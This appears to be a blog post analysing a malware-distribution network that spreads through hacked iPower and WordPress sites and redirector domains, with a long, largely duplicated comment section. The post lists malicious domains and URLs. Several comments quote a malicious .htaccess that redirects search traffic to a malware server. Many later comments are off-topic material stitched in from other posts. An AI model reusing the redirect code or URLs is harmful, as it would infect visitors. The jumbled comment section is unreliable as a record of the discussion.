More computer crime anatomy

So a while ago, I posted extensively about an underground network of computer virus distributors that I’d uncovered while pursuing American ISP iPower Web about their ongoing, chronic security problems which I first wrote about last December.

It seems that in the brave new world of the Intertubes, crime does pay. It pays very well indeed, in fact. The network I documented earlier has morphed and changed radically in the past few weeks, and become larger and more resilient. In addition, a new attack vector has emerged: attacks on old, outdated versions of WordPress weblog software.

I know that a lot of folks on my flist maintain their own WordPress blogs. Please, please, please, if you run WordPress or know somebody who does, update your WordPress software. It’s quick (takes about five minutes) and easy, and all versions of WordPress prior to 2.5 should be considered completely insecure.

In the past couple of weeks, I’ve noticed a huge surge in WordPress hack attacks, to the point where last Monday there were more hacked WordPress systems than hacked iPower Web sites that were being used to redirect folks to Eastern European virus downloaders. It seems quite likely that the hackers are using automated tools to find and automatically attack old WordPress installs, though one person I’ve spoken with says he believes his WordPress install was attacked through an insecure FTP username and password that was brute-force guessed as well.

The network that is being used to distribute viruses is being fed from a lot of different sources: hacked iPower sites (of course), hacked WordPress installations, Google Groups set up as malicious redirectors, custom attack domains piggybacked on top of legitimate Web URLs, and hijacked phpBB and phpNuke installs seem to be the most common. For an update on what’s going on in the seamy computer underground, and a new map of the computer distribution network:

The updated virus distribution map as it existed last Monday (I’ve been sick for the last week and a half, so I haven’t got ’round to writing this post) looks something like this.

A lot has changed since I constructed the first map. The biggest single difference is there are now a large number of sites that serve the function of www.traffloader.info: they choose a virus dropper at random to redirect a user to.

The network still works in pretty much the same way. The hackers place redirectors on hacked iPower sites, or on hacked WordPress, phpNuke, or phpBB sites, or the hackers hack the DNS entry for a Web site such as www.unicmanila.org (the official United Nations Web site for the Philippines) to add a new record for http://making-gay-porn.unicmanila.org/ (which redirects to one of the traffic handlers that in turn redirects to a virus dropper).

WARNING *** WARNING *** WARNING

Many of the links here and elsewhere in this post are live. As of the time of this writing, they redirect to active virus distributors which can and will infect unpatched Windows computers, and in one case will try to infect Mac computers, with a virus. DO NOT click on these links if you don’t know what you’re doing. DO NOT allow any of these sites to download or install software onto your computer.


A visitor gets nto the network by doing a Google search, which turns up one of the hackers hacked sites. When he clicks on the Google result, he is sent to a traffic handling Web site. In the past, there was only one of these: traffloader.info, which kept a record of the Google search the user used and would then pick a virus dropper at random to send the user to. Doing this has several advantages: it places an extra step between the hacked Web site and the place where the virus comes from, making it more difficult to trace the source of the infection; and if one virus dropping Web site goes offline or is taken down, traffloader.info will simply start redirecting people to a different virus dropping Web site.

The traffloader.info URL itself, though, is a single point of failure. If traffloader.info is ever taken down (unlikely, since it’s hosted in Eastern Europe and registered through crime-friendly, hacker-friendly registrar EST Domains), the whole network fails. And the hackers, apparently, have realized this.

In the past several weeks, many new Web sites have come online that do the same thing that traffloader.info does: they take a visitor, log the Google search the visitor made to get to a hacked site, then send the visitor off to another site that drops a virus. I’ve found several traffloader.info mirrors that are up and running as of the time of this writing:

traffloader.info/go.php (registrar: estdomains)
traff-mega.net/in.php (registrar: estdomains)
blyapizdets.info/go.php (registrar: estdomains)
kentford.cn/in.php (registered in China; currently using ns1.palaroid.info as name server, which is registered by estdomains)

So traffic comes in through a hacked Web site and goes to one of these sites. From there, it is redirected to one of the virus dropper sites, which have (as the chart above shows) exploded in number.

Some of the hacked WordPress installs don’t redirect to a traffic handler site, but instead redirect directly to a virus dropper hosted at sexlookupworld.com directly.

Interestingly, some of the hacked WordPress sites also redirect, not to a virus dropper at all, but to www.cams.com (an affiliate pay-for-access porn Webcam site) or to xml.valary.com (which is a front-end for several pay-per-search search engines). It’s possible the hackers responsible for the iPower intrusions and the WordPress hacks are also looking to expand their revenue stream by using the hacked Web sites to redirect to pay-per-search engines and old-fashioned affiliate porn sites. It’s also possible that these particular hacks are the work of some other party, who has noticed the vulnerable WordPress installs (or possibly is using the same automated hacking tools that the virus guys are using) to try to piggyback on the WordPress exploits.

Another new twist is poisoned Google Groups. The hackers have set up a large number of Google Groups, which they are advertising by conventional and Weblog spam. These Google Groups have names like

http://groups.google.com/group/orgasm-video/web/free-teen-orgasm-movie
and
http://groups.google.com/group/forced-sex-video/web/free-anal-rape-video
and
http://groups.google.com/group/family-sex-video/web/free-father-daughter-sex-video

Visiting the home page of any of these Google Groups reveals a link to sexlookupworld.com, which (predictably) attempts to install a virus on the visitor’s system.

What’s also interesting is that the number of payload sites which examine the visitor’s browser user-agent and automatically install Mac or Windows malware has not proliferated. As of the time of this writing, I have identified only one site that tries to download Mac malware; the additional new payload sites still download Windows-only malware. I don’t know if this means that the hackers have decided the number of Mac users who will infect themselves is too small to pay attention to, or if they simply have had their hands full expanding the network.

The new network is far more resilient than the old network was, and no longer has a single point of failure. It also has a much larger number of inputs, and more ways to trap the unwary into infecting themselves. The explosion of compromised WordPress installs is especially worrisome.

Folks, running software on your own Web server means vigilance. It’s the price you pay for getting your own blog–now you own all the security concerns. I cannot stress this enough: If you run software, ANY software, on your server, you MUST be diligent in keeping up with security patches. As of version 2.5, WordPress now automatically notifies you of security updates when you log in to the administrator area. And again, if you are running any version of WordPress prior to 2.5 in any configuration, you should assume you can be pwn3d at will, and that potentially everything on your Web server is up for grabs. The hackers don’t even have to target you in specific; judging from the number of compromised WordPress installs I’ve seen, they simply have to run automated programs that scan the Web searching for insecure WordPress installs.

Even the Boston Public Library’s WordPress install has been hacked, and is currently hosting redirectors to virus droppers with URLs such as

http://blog.bpl.org/brls/wp-content/uploads/2007/02/incest-hentai-22_2_08.html

This suggests the attackers have gained full access to the wp-content/uploads directory and can upload HTML files to it at will.

Edit: Mere minutes after posting this, I discovered another source of inputs to the network: compromised, fake, or otherwise dodgy Facebook profiles. Lots and lots and lots of them. Either within the profiles themselves, or within comments on the profile pages, I’ve seen a very large number of links to sexlookupworld.com.

144 thoughts on “More computer crime anatomy

  1. Oddly, I woke up to a nightmare this morning that malware had completely taken over my computer. It was everywhere and there was no getting rid of it.

    I don’t use wordpress, but I’m going to get very cautious, now.

    And, yeah, I know this is a completely weird comment.

  2. Oddly, I woke up to a nightmare this morning that malware had completely taken over my computer. It was everywhere and there was no getting rid of it.

    I don’t use wordpress, but I’m going to get very cautious, now.

    And, yeah, I know this is a completely weird comment.

  3. Franklin – thanks so much for this warning. I understand enough of it that upgrading is now my first priority. I’ve also linked to this on Twitter.

  4. Franklin – thanks so much for this warning. I understand enough of it that upgrading is now my first priority. I’ve also linked to this on Twitter.

  5. Franklin – thanks so much for this warning. I understand enough of it that upgrading is now my first priority. I’ve also linked to this on Twitter.

  6. Franklin – thanks so much for this warning. I understand enough of it that upgrading is now my first priority. I’ve also linked to this on Twitter.

  7. Thank you again for this warning.

    One of the communities I am part of called has been receiving posts from a user called and (as have other communities) with a link that looks suspiciously like it will lead to a malware site. After my run-in with one of these in March, I’m not clicking to see if it does though. πŸ™‚

    • I took a look at that community, and yes, you are absolutely right. The messages in that community redirect (through two intermediaries) to a Russian-hosted site that attempts to drop W32/Zlob on the user’s computer.

  8. Thank you again for this warning.

    One of the communities I am part of called has been receiving posts from a user called and (as have other communities) with a link that looks suspiciously like it will lead to a malware site. After my run-in with one of these in March, I’m not clicking to see if it does though. πŸ™‚

  9. I took a look at that community, and yes, you are absolutely right. The messages in that community redirect (through two intermediaries) to a Russian-hosted site that attempts to drop W32/Zlob on the user’s computer.

  10. Gogo.php found on several sites

    HI , I have found today several files on my server (Separated accounts) they have being created on a folder “UPLDR” and they are all named gogo.php. THis runs a script that redirects to “remote_host = “http://alojados.com/images/put.php”;

    Any idea how they get in?

  11. Gogo.php found on several sites

    HI , I have found today several files on my server (Separated accounts) they have being created on a folder “UPLDR” and they are all named gogo.php. THis runs a script that redirects to “remote_host = “http://alojados.com/images/put.php”;

    Any idea how they get in?

  12. quite a new system…

    this is fascinating, i’ve never heard of a system like this b4.. and im finding out first hand, my gf’s computer has it.. infected

    now… how does one clean it all up?

    • Re: quite a new system…

      If you’re on a Mac, there are directions for cleaning it up in the comments above. On a PC, it’s more difficult; many PC antivirus software still does not detect Zlob, even though it’s been circulating for a long time. If you’re running Windows, there are manual removal instructions here.

  13. quite a new system…

    this is fascinating, i’ve never heard of a system like this b4.. and im finding out first hand, my gf’s computer has it.. infected

    now… how does one clean it all up?

  14. Re: quite a new system…

    If you’re on a Mac, there are directions for cleaning it up in the comments above. On a PC, it’s more difficult; many PC antivirus software still does not detect Zlob, even though it’s been circulating for a long time. If you’re running Windows, there are manual removal instructions here.

  15. iPowerWeb hacked again

    iPowerWeb has been hacked again. My website (www.durangobill.com) is hosted by iPowerWeb. At some point in the last two weeks the following “.htaccess” file showed up in my home folder. What it does is to redirect any incoming search query to a malware site. The malware site will try to infect your computer with something under the guise that it is recommending that you install a security program. I’ve notified iPowerWeb and Google security about the problem, but at this point the problem is still alive and malicious.

    Caution – – – The link below connects to malware

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.88/in.html?s=ipw [R,L]
    Errordocument 404 http://87.248.180.88/in.html?s=ipw_err

    Caution – – – The link above connects to malware

    Sincerely,

    Bill Butler
    E-mail: lisabill@mydurango.net
    Website: http://www.durangobill.com

    (You can go directly to the above website and there isn’t a problem. If you go through a major search engine that links to any of my web pages, you will be redirected to the malware website.)

  16. iPowerWeb hacked again

    iPowerWeb has been hacked again. My website (www.durangobill.com) is hosted by iPowerWeb. At some point in the last two weeks the following “.htaccess” file showed up in my home folder. What it does is to redirect any incoming search query to a malware site. The malware site will try to infect your computer with something under the guise that it is recommending that you install a security program. I’ve notified iPowerWeb and Google security about the problem, but at this point the problem is still alive and malicious.

    Caution – – – The link below connects to malware

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.88/in.html?s=ipw [R,L]
    Errordocument 404 http://87.248.180.88/in.html?s=ipw_err

    Caution – – – The link above connects to malware

    Sincerely,

    Bill Butler
    E-mail: lisabill@mydurango.net
    Website: http://www.durangobill.com

    (You can go directly to the above website and there isn’t a problem. If you go through a major search engine that links to any of my web pages, you will be redirected to the malware website.)

  17. similar

    I too have a site hosted on iPower with a hacked htaccess file. they seem to place the file outside of the webroot, in the hosting root on mine. the first 65 lines of the file are blank followed with the mod-rewrite commands listed. just a warning, the links below appear to go to malware. i’ve stripped the http:// off the front of the ips to remove the link

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* 87.248.180.88/in.html?s=ipw [R,L]
    Errordocument 404 87.248.180.88/in.html?s=ipw_err

  18. similar

    I too have a site hosted on iPower with a hacked htaccess file. they seem to place the file outside of the webroot, in the hosting root on mine. the first 65 lines of the file are blank followed with the mod-rewrite commands listed. just a warning, the links below appear to go to malware. i’ve stripped the http:// off the front of the ips to remove the link

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* 87.248.180.88/in.html?s=ipw [R,L]
    Errordocument 404 87.248.180.88/in.html?s=ipw_err

  19. Is this a server problem?

    Hello all! Yesterday i found that my .htaccess had changed, with the same redirection code of the posts above (with 65 empty lines at begin, also).
    I’ve been looking for the bug (xss, http-injection) on my http logs or any unauthotized acces in ftp logs but i can’t find anything that changed my .htaccess.
    Do you mean this is a server problem and not of one of my php scripts? How can someone to change the .htaccess file whithout logon in the server? How can i avoid this?

    • Re: Is this a server problem?

      Given the number and severity of the security breaches at iPower, I believe it is a server problem, most likely an exploit within their vDeck platform. It seems to me that any iPower server can be penetrated, even if the particular sites on it do not countain vulnerable PHP scripts or other vulnerabilities.

      • Re: Is this a server problem?

        Thank you, but my server is Lypha and it uses CPanel… I am so worried about this problem and i don’t find where is the bug. Any clue will be welcome.

        • Re: Is this a server problem?

          Now that is interesting. I haven’t seen this kind of attack on ISPs other than iPower, so that’s a worrisome development. Do you know what version of cPanel they use?

          • Re: Is this a server problem?

            CPanel version is 11.23.4-STABLE.
            BTW, i’ve found that my .htacess was uploaded through FTP, according to my hosting support, from an IP of sbcglobal.net (AT&T) provider, in Chicago.
            I have changed my FTP password but i don’t think this was the problem, since my last password is too long to break with brute force.

  20. Is this a server problem?

    Hello all! Yesterday i found that my .htaccess had changed, with the same redirection code of the posts above (with 65 empty lines at begin, also).
    I’ve been looking for the bug (xss, http-injection) on my http logs or any unauthotized acces in ftp logs but i can’t find anything that changed my .htaccess.
    Do you mean this is a server problem and not of one of my php scripts? How can someone to change the .htaccess file whithout logon in the server? How can i avoid this?

  21. Re: Is this a server problem?

    Given the number and severity of the security breaches at iPower, I believe it is a server problem, most likely an exploit within their vDeck platform. It seems to me that any iPower server can be penetrated, even if the particular sites on it do not countain vulnerable PHP scripts or other vulnerabilities.

  22. Re: Is this a server problem?

    Thank you, but my server is Lypha and it uses CPanel… I am so worried about this problem and i don’t find where is the bug. Any clue will be welcome.

  23. Re: Is this a server problem?

    Now that is interesting. I haven’t seen this kind of attack on ISPs other than iPower, so that’s a worrisome development. Do you know what version of cPanel they use?

  24. Re: Is this a server problem?

    CPanel version is 11.23.4-STABLE.
    BTW, i’ve found that my .htacess was uploaded through FTP, according to my hosting support, from an IP of sbcglobal.net (AT&T) provider, in Chicago.
    I have changed my FTP password but i don’t think this was the problem, since my last password is too long to break with brute force.

  25. My server got this same hack…

    I too run a CPanel server and one of the clients on my server had this htaccess file installed in the web root. I will have to do some more checking to see where it came from.

  26. My server got this same hack…

    I too run a CPanel server and one of the clients on my server had this htaccess file installed in the web root. I will have to do some more checking to see where it came from.

  27. ipower hacking

    I am another hacked site, and am not web saavy enough to know a lot of the technical information, but I AM upset that a copy of my website popped up as a www. address and infected two of my customers. I looked at the source code of this bogus site and it appears that the malware is gone; there is mostly the code I wrote plus an add-on http-equiv line that my webhost put in when they removed the malware. The domain I pay for is simply http://tesselliott.com but a Google search on my name pops up: http://www.tesselliott.com and last week two of my customers got redirected from there to strange places, and found malware on their computers. How is it that my website is in two places at the same time? This may seem like a dumb question, but I am actually proud of being an artist who can deal with the internet and write my own HTML. Am determined to learn what I need to know for security. And thank you for your efforts.

  28. ipower hacking

    I am another hacked site, and am not web saavy enough to know a lot of the technical information, but I AM upset that a copy of my website popped up as a www. address and infected two of my customers. I looked at the source code of this bogus site and it appears that the malware is gone; there is mostly the code I wrote plus an add-on http-equiv line that my webhost put in when they removed the malware. The domain I pay for is simply http://tesselliott.com but a Google search on my name pops up: http://www.tesselliott.com and last week two of my customers got redirected from there to strange places, and found malware on their computers. How is it that my website is in two places at the same time? This may seem like a dumb question, but I am actually proud of being an artist who can deal with the internet and write my own HTML. Am determined to learn what I need to know for security. And thank you for your efforts.

  29. replace Entitlement with Female Priviledge

    Honestly, entitlement is just an exacerbated awareness of privilege, so it doesn’t deserve its own bubble. Instead, Female Privilege does, because the “one vagina” policy very much exists in many couples. Heck, to make this cognitively perfect color-wise, you’d need the Female Privilege to be in the pink bubble and the Couple Privilege to be in the neutral green bubble.

  30. replace Entitlement with Female Priviledge

    Honestly, entitlement is just an exacerbated awareness of privilege, so it doesn’t deserve its own bubble. Instead, Female Privilege does, because the “one vagina” policy very much exists in many couples. Heck, to make this cognitively perfect color-wise, you’d need the Female Privilege to be in the pink bubble and the Couple Privilege to be in the neutral green bubble.

  31. Re: replace Entitlement with Female Priviledge

    I’m not sure you’re operating under the same definition of privilege that this post is using.
    Could you please define “female privilege” as you see it?

  32. Re: replace Entitlement with Female Priviledge

    I’m not sure you’re operating under the same definition of privilege that this post is using.
    Could you please define “female privilege” as you see it?

  33. “There’s a passport checkpoint on each side of the Channel. Outbound, we passed through French passport control, who looked at a van packed to the gills with people and luggage and just waved us through without even stopping us. The French, you see, who have a history of being invaded, are a lot more relaxed about these things than the British, who don’t.”

    Or, it could be that France is already compromised, invaded by the modern-day descendants of the Moors. What have they got to lose? It couldn’t get much worse.

  34. “There’s a passport checkpoint on each side of the Channel. Outbound, we passed through French passport control, who looked at a van packed to the gills with people and luggage and just waved us through without even stopping us. The French, you see, who have a history of being invaded, are a lot more relaxed about these things than the British, who don’t.”

    Or, it could be that France is already compromised, invaded by the modern-day descendants of the Moors. What have they got to lose? It couldn’t get much worse.

  35. The ice on fern fronds pic is breathtaking. They all are, but especially that one.

    Department of the Bleeding Obvious LMAO!

    Thank you for sharing.

  36. The ice on fern fronds pic is breathtaking. They all are, but especially that one.

    Department of the Bleeding Obvious LMAO!

    Thank you for sharing.

  37. I’m a little bit south of there but could make it in if you have a free spot in your schedule. Have you done wicked grounds yet?

    If you’re in the mood for kinky shopping, there’s Mr s.

  38. I’m a little bit south of there but could make it in if you have a free spot in your schedule. Have you done wicked grounds yet?

    If you’re in the mood for kinky shopping, there’s Mr s.

  39. Generally, we try to have the subject avoid moving. Either another person does the stimulation, or self-stimulation is done with a stationary vibrator. The Neurosky chip is actually pretty good at filtering out noise from movement, but it’s far from perfect.

  40. Generally, we try to have the subject avoid moving. Either another person does the stimulation, or self-stimulation is done with a stationary vibrator. The Neurosky chip is actually pretty good at filtering out noise from movement, but it’s far from perfect.

  41. I’ve never been to frolicon

    Bu suggested I should check it out but I’m a bit nervous about going by myself.(lol! he’s not into it but he thinks I should go) can you tell me your impressions of it?

  42. I’ve never been to frolicon

    Bu suggested I should check it out but I’m a bit nervous about going by myself.(lol! he’s not into it but he thinks I should go) can you tell me your impressions of it?

  43. I love Arduino projects and would like to peek at your sketch if you don’t mind. This is the perfect project for a beginner, or do you think it’s more involved than that?

  44. I love Arduino projects and would like to peek at your sketch if you don’t mind. This is the perfect project for a beginner, or do you think it’s more involved than that?

  45. I can only say what others have said before – this is a great post and it gets added straight to my memories! πŸ˜€

  46. I can only say what others have said before – this is a great post and it gets added straight to my memories! πŸ˜€

  47. Lovely! I now have something to tie for KG this month.

    (And I see I should read the earlier posts, even if figging has unfortunate memories associated with it these days.)

  48. Lovely! I now have something to tie for KG this month.

    (And I see I should read the earlier posts, even if figging has unfortunate memories associated with it these days.)

  49. I’d really love to run the next version from a lithium-ion battery.

    There are some challenges. The Arduino can run on 3.3v, but it really wants at least 7 volts–internally, the analog outputs are 5v, and it has a dropout voltage regulator that takes anything greater than 5v down to 5. The analog outputs get a bit fussy when you run it at 3.3, and the dropout voltage regulator prefers an input voltage of 7v or more for reasons I’m not entirely clear on.

    I could probably make it work with 6.6 (two 3.3v lithium batteries), though I’m concerned about voltage sags if I run the sex toy from just one of the 3.3v batteries. If I run it from both, I need a voltage regulator for the sex toy, and that gets tricky because a typical egg-type vibrator will draw six watts of power steadily and more than that when it first starts up. I’ve blown up voltage regulators by trying to connect them to the motors in sex toys; they can consume a fearsome amount of peak current when they start running.

  50. I’d really love to run the next version from a lithium-ion battery.

    There are some challenges. The Arduino can run on 3.3v, but it really wants at least 7 volts–internally, the analog outputs are 5v, and it has a dropout voltage regulator that takes anything greater than 5v down to 5. The analog outputs get a bit fussy when you run it at 3.3, and the dropout voltage regulator prefers an input voltage of 7v or more for reasons I’m not entirely clear on.

    I could probably make it work with 6.6 (two 3.3v lithium batteries), though I’m concerned about voltage sags if I run the sex toy from just one of the 3.3v batteries. If I run it from both, I need a voltage regulator for the sex toy, and that gets tricky because a typical egg-type vibrator will draw six watts of power steadily and more than that when it first starts up. I’ve blown up voltage regulators by trying to connect them to the motors in sex toys; they can consume a fearsome amount of peak current when they start running.

  51. the spellcheck does not recognize that words can contain an apostrophe

    This.  This slays me.  There are things that annoy me about my phone, like the craplets (I am stealing that word a lot) and wtf the back button, but APOSTROPHE WORDS.  COME ON.

  52. the spellcheck does not recognize that words can contain an apostrophe

    This.  This slays me.  There are things that annoy me about my phone, like the craplets (I am stealing that word a lot) and wtf the back button, but APOSTROPHE WORDS.  COME ON.

  53. ^ this

    Generally, what you’re describing in this post happened to me once, so I avoided the Madison scene for years. ‘Prominent man’ wasn’t hearing what I had to say, so I spread the word of his ignoring my well-defined boundaries. I was ostracized, but didn’t mind so much since I wasn’t interested in a place that condoned his kind of behavior. I just made sure incoming girls understood who and what that man was before they went further.

    Now that I’m in a monogamous relationship, I’m a little saddened that I’ve lost that part of my development that could have been better enjoyed with more worthy partners.

  54. ^ this

    Generally, what you’re describing in this post happened to me once, so I avoided the Madison scene for years. ‘Prominent man’ wasn’t hearing what I had to say, so I spread the word of his ignoring my well-defined boundaries. I was ostracized, but didn’t mind so much since I wasn’t interested in a place that condoned his kind of behavior. I just made sure incoming girls understood who and what that man was before they went further.

    Now that I’m in a monogamous relationship, I’m a little saddened that I’ve lost that part of my development that could have been better enjoyed with more worthy partners.

  55. Thank you

    I was raped six weeks after my first dom died. I asked about the person before setting up a play date with the person who raped me. I did everything “right” and I was still raped. Due to my more traumatic childhood and young adulthood I was able to deal with the rape better than a lot of people. I was infuriated more than anything else.
    It wasn’t until an event where someone acted in an out of control manner that I told anyone about what had happened– it was almost a year after the rape and I was the secretary for one of our local BDSM groups. The people I was close to were shocked that I hadn’t told anyone– and that I continued to play, educate and live my life. What they didn’t know is how the rape shaped how I dealt with people. I took more control over me. I did away with the mindset that since I was a submissive I had to “put up” with what someone dished out. It might be a nice erotic fantasy, but in reality no one touches me without my permission– and yes, this goes for my dom (and we’ve been together for 8 years now). As for Fetlife, if anyone looked up my profile I list myself as a switch simply because it keeps a lot of the trolls at bay.
    As for the people who think a submissive should enjoy rape, they’re confusing fantasy rape with the real thing. A lot of us LOVE rape fantasies. I love rape fantasies, but in a rape fantasy there is ALWAYS control. In the real thing there is NO CONTROL. I think that’s what terrifies me the most is the fact that a previously self-possessing person turns into an animal that can’t or won’t control their own behavior. I suspect because rape fantasies are so common (even vanilla people have such fantasies) that we can’t help but think that the victim really is enjoying the rape at least a little. The fact is there is nothing enjoyable about being raped. There is nothing erotic about the real thing. There is no reason to condone or protect a rapist…and when the person who violates another person is a community leader, it’s absolutely reprehensible…and sadly, there are far too many community leaders even national speakers who have gotten away with bad behavior.

  56. Thank you

    I was raped six weeks after my first dom died. I asked about the person before setting up a play date with the person who raped me. I did everything “right” and I was still raped. Due to my more traumatic childhood and young adulthood I was able to deal with the rape better than a lot of people. I was infuriated more than anything else.
    It wasn’t until an event where someone acted in an out of control manner that I told anyone about what had happened– it was almost a year after the rape and I was the secretary for one of our local BDSM groups. The people I was close to were shocked that I hadn’t told anyone– and that I continued to play, educate and live my life. What they didn’t know is how the rape shaped how I dealt with people. I took more control over me. I did away with the mindset that since I was a submissive I had to “put up” with what someone dished out. It might be a nice erotic fantasy, but in reality no one touches me without my permission– and yes, this goes for my dom (and we’ve been together for 8 years now). As for Fetlife, if anyone looked up my profile I list myself as a switch simply because it keeps a lot of the trolls at bay.
    As for the people who think a submissive should enjoy rape, they’re confusing fantasy rape with the real thing. A lot of us LOVE rape fantasies. I love rape fantasies, but in a rape fantasy there is ALWAYS control. In the real thing there is NO CONTROL. I think that’s what terrifies me the most is the fact that a previously self-possessing person turns into an animal that can’t or won’t control their own behavior. I suspect because rape fantasies are so common (even vanilla people have such fantasies) that we can’t help but think that the victim really is enjoying the rape at least a little. The fact is there is nothing enjoyable about being raped. There is nothing erotic about the real thing. There is no reason to condone or protect a rapist…and when the person who violates another person is a community leader, it’s absolutely reprehensible…and sadly, there are far too many community leaders even national speakers who have gotten away with bad behavior.

  57. We may not be guilty until proven innocent, but we are certainly treated that way.

    As to what I suggest: I suggest you act on the facts of the situation. The facts being that most men are interested in forming mutuality gratifying relationships and have no desire to harm anyone, and that most of us can handle rejection without becoming violent.

    Your statements about the statistics of rape being reported, prosecuted, and punished are very true. It’s also true that only a small portion of the male population have ever sexually assaulted anyone.

    Most of us only want to make our partners happy.

  58. We may not be guilty until proven innocent, but we are certainly treated that way.

    As to what I suggest: I suggest you act on the facts of the situation. The facts being that most men are interested in forming mutuality gratifying relationships and have no desire to harm anyone, and that most of us can handle rejection without becoming violent.

    Your statements about the statistics of rape being reported, prosecuted, and punished are very true. It’s also true that only a small portion of the male population have ever sexually assaulted anyone.

    Most of us only want to make our partners happy.

  59. Since you hate people backing out, I’ll give you one last reply.

    “I have explained myself when asked and I have corrected assumptions james_the_evil1 had about feminism that were just factually untrue.”

    Untrue in your opinion. Your ideas on feminism and sexual discrimination are your ideas. You believe them and there for treat them as fact. However in the end they are only opinions. Opinions that many men, and even some woman, don’t agree with.

    “When you come into debates about female issues, you SHOULD take the position of listening and being instructed about these issues because you don’t experience them and you are not an authority.”

    I have listened, but I don’t always agree. I don’t know what it’s like to be a woman, never will. I don’t know what it’s like to be a rose either, but I am quite skilled at growing them. Just because I’m not female does not mean my opinion is automatically invalid, and the fact that my opinions are different from yours doesn’t invalidate it either.

    You haven’t even considered the possibility that my statements that a person can live in spite of fear instead of living with it. When I recommended reference material related to it, you said out right you weren’t willing to read it. Yet you accuse me of not listening.

    “I’m so sick and tired of people backing out of discussions because someone’s “instructing”.”

    Then try discussing instead of instructing. To put it bluntly people, myself included, aren’t interested in being preached to. If you want us to stay engaged and interested, try listening. Try not invalidating everything a man says by simply because we aren’t women.

    You say you are for sexual equality. Yet you consistently use the fact that I’m male as an excuse to invalidate my opinions. You say that you wish male/female distinctions didn’t exist. Yet you cling to those differences in every aspect of every argument you make. If you want sexual equality, start by treating men as your equals. If you want to eliminate sexual distinctions stop treating men differently than you would treat women.

    My purpose in reading and using LiveJournal is for entertainment. This ceased being entertaining quite a while ago.

  60. Since you hate people backing out, I’ll give you one last reply.

    “I have explained myself when asked and I have corrected assumptions james_the_evil1 had about feminism that were just factually untrue.”

    Untrue in your opinion. Your ideas on feminism and sexual discrimination are your ideas. You believe them and there for treat them as fact. However in the end they are only opinions. Opinions that many men, and even some woman, don’t agree with.

    “When you come into debates about female issues, you SHOULD take the position of listening and being instructed about these issues because you don’t experience them and you are not an authority.”

    I have listened, but I don’t always agree. I don’t know what it’s like to be a woman, never will. I don’t know what it’s like to be a rose either, but I am quite skilled at growing them. Just because I’m not female does not mean my opinion is automatically invalid, and the fact that my opinions are different from yours doesn’t invalidate it either.

    You haven’t even considered the possibility that my statements that a person can live in spite of fear instead of living with it. When I recommended reference material related to it, you said out right you weren’t willing to read it. Yet you accuse me of not listening.

    “I’m so sick and tired of people backing out of discussions because someone’s “instructing”.”

    Then try discussing instead of instructing. To put it bluntly people, myself included, aren’t interested in being preached to. If you want us to stay engaged and interested, try listening. Try not invalidating everything a man says by simply because we aren’t women.

    You say you are for sexual equality. Yet you consistently use the fact that I’m male as an excuse to invalidate my opinions. You say that you wish male/female distinctions didn’t exist. Yet you cling to those differences in every aspect of every argument you make. If you want sexual equality, start by treating men as your equals. If you want to eliminate sexual distinctions stop treating men differently than you would treat women.

    My purpose in reading and using LiveJournal is for entertainment. This ceased being entertaining quite a while ago.

  61. WoW! What an amazing Post

    “To me, all these “she should have” statements are a little fucked up. See, here’s the thing: Often, the folks in the BDSM community who end up assaulting someone are well-respected leaders in the community, with impeccable references and strong community support.”

    I can highly identify with my own personal experiences in the fetish industry especially observing dommes who have been here longer than I have. I get more bullshit drama from these type of dommes than I do slaves or new dommes.

    BRAVO to this awesome master piece!

  62. WoW! What an amazing Post

    “To me, all these “she should have” statements are a little fucked up. See, here’s the thing: Often, the folks in the BDSM community who end up assaulting someone are well-respected leaders in the community, with impeccable references and strong community support.”

    I can highly identify with my own personal experiences in the fetish industry especially observing dommes who have been here longer than I have. I get more bullshit drama from these type of dommes than I do slaves or new dommes.

    BRAVO to this awesome master piece!

  63. Sure. I’d rather be equal, too.

    But if you are saying that by *just you* treating women as equals they don’t experience *not being equals every bloody day* then you are deluding yourself and your privilege is blinding you.

    Are you interested in understanding male privilege? It doesn’t seem like you are, because you seem to enjoy being in My-Little-Ponyland of cupcakes and equality between humans, but if you do kinda sorta think that maybe women aren’t actually equal and do have a little more likelihood of being abused by a partner or raped in their lifetime, check this out: http://www.amptoons.com/blog/the-male-privilege-checklist/

    That said, I kind of agree with you on one thing. Expressing fear can be dangerous. If I’m walking down a street, sure, any dude could be a rapist or a mugger, so I walk like if they dare fuck with me I will destroy them, and I haven’t had too many issues yet. Once I had a guy spank me at a bus stop and I tore him a new one.

    Once I had a guy grab me into a hug and kiss me, though, randomly (seriously, I was walking to the bus) and it freaked me the fuck out. I realized I was in a neighborhood where no one would really care if I screamed bloody murder- the cops would take a while to show up. I might not win the fight against him. It made me very aware that I am not invincible.

    *That* is what SchrΓΆdinger’s Rapist is about, in my mind. I’m a pretty sassy fighty type of girl, but *that doesn’t matter* if I gamble and lose.

  64. Sure. I’d rather be equal, too.

